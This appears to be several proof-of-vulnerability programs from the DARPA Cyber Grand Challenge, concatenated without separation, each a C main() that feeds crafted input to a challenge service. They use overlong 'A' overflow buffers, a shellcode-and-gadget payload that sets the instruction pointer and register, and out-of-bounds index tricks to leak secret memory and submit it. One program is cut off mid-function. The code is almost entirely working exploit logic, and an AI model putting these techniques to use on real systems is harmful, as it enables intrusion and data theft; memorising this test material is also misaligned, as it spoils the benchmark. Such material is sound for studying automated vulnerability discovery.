int main() { unsigned char exploit[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0c\"8N"; char admin_name[] = {12, 34, 56, 78 }; type2_vals t2; type2_negotiate(&t2); int secret = 0; unsigned char buf[200]; unsigned short msg_length = 0; unsigned short register_user_req = 11382; char user_name[] = { 11, 22, 33, 44 }; //Register first user (this user will have name overwritten) transmit_all(STDOUT, ®ister_user_req, sizeof(register_user_req)); msg_length = sizeof(user_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, user_name, sizeof(user_name)); //Logout user unsigned short logout_req = 8719; transmit_all(STDOUT, &logout_req, sizeof(logout_req)); unsigned short login_req = 8711; //Using the login (vulnerable) command overwrite user name of first user transmit_all(STDOUT, &login_req, sizeof(login_req)); msg_length = sizeof(exploit) - 1; transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, exploit, sizeof(exploit) - 1); msg_length = sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); //Now login as the administrator transmit_all(STDOUT, &login_req, sizeof(login_req)); msg_length = sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); msg_length = sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); unsigned short remote_token_req = 7777; unsigned short page_idx = 100; transmit_all(STDOUT, &remote_token_req, sizeof(remote_token_req)); transmit_all(STDOUT, &page_idx, sizeof(page_idx)); unsigned short exit_server = 9999; transmit_all(STDOUT, &exit_server, sizeof(exit_server)); length_read(STDIN, buf, 24); length_read(STDIN, (unsigned char *)(&secret), sizeof(secret)); type2_submit((unsigned char *)(&secret), sizeof(secret)); return 0; }
int main(void) { type2_negotiate(&t2_vals); protocol_consume_str(); transmit(STDERR, "1", 1, NULL); protocol_send_str("FIND ord('x', 0 - 29881 * 65536 + 74513) FROM x"); transmit(STDERR, "\n", 1, NULL); protocol_with_recv_string(^(uint16 len, char* str) { unsigned char* ustr = (unsigned char*)str; t2buf[0] = atoi(ustr, len); });
int main() { type2_vals t2v; unsigned char* ScreenBuf[MAX_LINES]; unsigned LineCnt; #ifndef DEBUG type2_negotiate(&t2v); #else (void)t2v; #endif transmit_all(STDOUT, "l23k", 4); send_string(STDERR, "GOING\n"); LineCnt = ReadScreen(ScreenBuf); for (unsigned Index = 0; Index < 64; ++Index) { send_string(STDERR, "LOOP\n"); send_string(STDOUT, "0\n"); LineCnt = ReadScreen(ScreenBuf); } send_string(STDOUT, "shuf\n"); LineCnt = ReadScreen(ScreenBuf); send_string(STDOUT, "4986\n"); LineCnt = ReadScreen(ScreenBuf); send_string(STDOUT, "4\n"); LineCnt = ReadScreen(ScreenBuf); send_string(STDOUT, "dupr\n"); LineCnt = ReadScreen(ScreenBuf); char* s = (char *)ScreenBuf[LineCnt - 2]; s = strchr(s, ':'); s += 2; int m = strtol(s, NULL, 10); unsigned char secret[4]; cgc_memcpy(secret, (void *)&m, 4); secret[0] ^= 0x14; secret[1] ^= 0x15; secret[2] ^= 0x16; secret[3] ^= 0x17; send_string(STDERR, (char *)s); send_string(STDERR, "----->\n"); type2_submit((unsigned char *)secret, 4); send_string(STDOUT, "quit\n"); }
int main(void) { // negotiate type2_vals t2vals; type2_negotiate(&t2vals); // perform POV char input[11]; ReceiveFromCB(input, 10); char bytes[55] = "ish hostname +p password +l username dump 1128775680 \n"; //print_integer(bytes + 42, t2vals.region_addr); SendToCB(bytes, cgc_strlen(bytes)); unsigned int i = 0xffffffff; SendToCB("quit\n", 5); ReceiveFromCB((char *)&i, 4); type2_submit((unsigned char *)&i, 4); return 0; }
int main() { type2_vals t2; unsigned char buf[200]; int i; size_t bytes; cgc_memcpy(buf, "\x00\xff""HDR\x05\x00\x00\x00\x01\x00" "ALBM\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x20\xc0\x47\x43""CCCCAAAAAAAAAAAA" "TITL\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x30\xc0\x47\x43""CCCCAAAAAAAAAAAA\x7f", 140); random(buf + 11 + 8 + 24, 12, &bytes); random(buf + 11 + 8 + 24 + 16, 16, &bytes); random(buf + 11 + 0x40 + 8 + 24, 12, &bytes); random(buf + 11 + 0x40 + 8 + 24 + 16, 16, &bytes); for (i = 0; i < 139; i++) { // make sure we didn't introduce any bad chars if (i >= 11 + 0x20 && i < 11 + 0x40 && buf[i] < 0x10) buf[i] ^= 0x55; if (i >= 11 + 0x60 && i < 11 + 0x80 && buf[i] < 0x10) buf[i] ^= 0x55; if (buf[i] == 0x7f) buf[i] = 0x3f; if (buf[i] == 0x7e) buf[i] = 0x3e; } type2_negotiate(&t2); transmit_all(STDOUT, buf, 140); length_read(STDIN, buf, 0x58); length_read(STDIN, buf, 16); // buf contains: "Album: ?????????" // as long as buf does not contain "Arti", we have won for (i = 7; i < 16; i++) if (memcmp(&buf[i], "Arti", 4) == 0) break; if (i == 16) { type2_submit(buf + 7, 4); return 0; } // we found "Arti", so look some more length_read(STDIN, buf, 8); type2_submit(buf + 4, 4); return 0; }
int main() { type2_vals t2; type2_negotiate(&t2); char *register_player = "1\nPovPlayer, 1\n"; char *reregister_player = "4\n1\n123456789012345678901234, 1\n"; char *cgc_exit = "4\n2\n"; transmit_all(STDOUT, register_player, cgc_strlen(register_player)); read_until_game_prompt(); transmit_all(STDOUT, reregister_player, cgc_strlen(reregister_player)); play_hi_lo(0); transmit_all(STDOUT, cgc_exit, cgc_strlen(cgc_exit)); return 0; }
int main(int cgc_argc, char *cgc_argv[]) { unsigned char buf[128]; type1_vals t1; cgc_type1_negotiate(0x00ffffff, 0x00ffffff, 5, &t1); t1.ipval |= 0x91000000; t1.regval |= 0x91000000; #if 0 unsigned char data[4]; type2_vals t2; type2_negotiate(&t2); /* ... */ type2_submit(data, 4); #endif // query *(unsigned int *)&buf[0] = 36 + 39; *(unsigned int *)&buf[4] = 0x367bae4d; // exe *(unsigned int *)&buf[8] = 0x4E269472; *(unsigned int *)&buf[12] = 0x2000; *(unsigned int *)&buf[16] = 0x2000; *(unsigned int *)&buf[20] = 39; *(unsigned int *)&buf[24] = 0x2020; *(unsigned int *)&buf[28] = 0; *(unsigned int *)&buf[32] = 0x2020; *(unsigned int *)&buf[36] = 0; // gadget (0x90000101): pop ebx, pop ebp, ret cgc_memcpy(&buf[40], "\x81\xec\x94\x80\x01\x00\xc7\x04\x24\x42\x42\x42\x42\x4c\x4c\x4c\x4c\xc7\x04\x24\x41\x41\x41\x41\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\xc7\x04\x24\x05\x01\x00\x90", 39); // set ip and ebp *(unsigned int *)&buf[49] = t1.ipval; *(unsigned int *)&buf[60] = t1.regval; cgc_transmit_all(STDOUT, buf, 40 + 39); cgc_length_read(STDIN, buf, 4); return 0; }
int main(void) { #ifndef DEBUG xlat_seed("9an538n9av3;5"); #endif char buf[1024]; int secrets = 0x4347c010; const char* reg = "charlie" EOT_S; const char* sub_self = "s" EOT_S "charlie" EOT_S; const char* start_blub = "b" EOT_S; const char* read_blubs = "r" EOT_S; length_read(0, (unsigned char*)buf, 0x4); #ifndef TESTING unsigned char data[4]; type2_vals t2; type2_negotiate(&t2); #endif send_string(1, reg); length_read(0, (unsigned char*)buf, 0x4); send_string(1, sub_self); send_string(1, start_blub); send_string(1, "adf"); transmit_all(1, &secrets, sizeof(secrets)); send_string(1, EOT_S); send_string(1, read_blubs); length_read(0, (unsigned char*)buf, 0x30); length_read(0, (unsigned char*)buf, 0x4); #ifndef DEBUG size_t client_0_data = 0xb7e004f8; #else size_t client_0_data = 0xb7e000b8; #endif size_t secret_addr = (*(size_t*)buf) + 44; int diff = secret_addr - client_0_data; diff /= 4; int idx = (2 << 29) - diff; _convert_signed(buf, -idx, 10, 0); char tosend[1024]; strcat(tosend, "y"); strcat(tosend, EOT_S); strcat(tosend, "charlie"); strcat(tosend, EOT_S); strcat(tosend, buf); strcat(tosend, EOT_S); send_string(1, tosend); send_string(1, read_blubs); const char* cgc_exit = "e" EOT_S; send_string(1, cgc_exit); #ifndef TESTING length_read(0, (unsigned char*)buf, 336); length_read(0, data, 4); type2_submit(data, 4); #endif return 0; }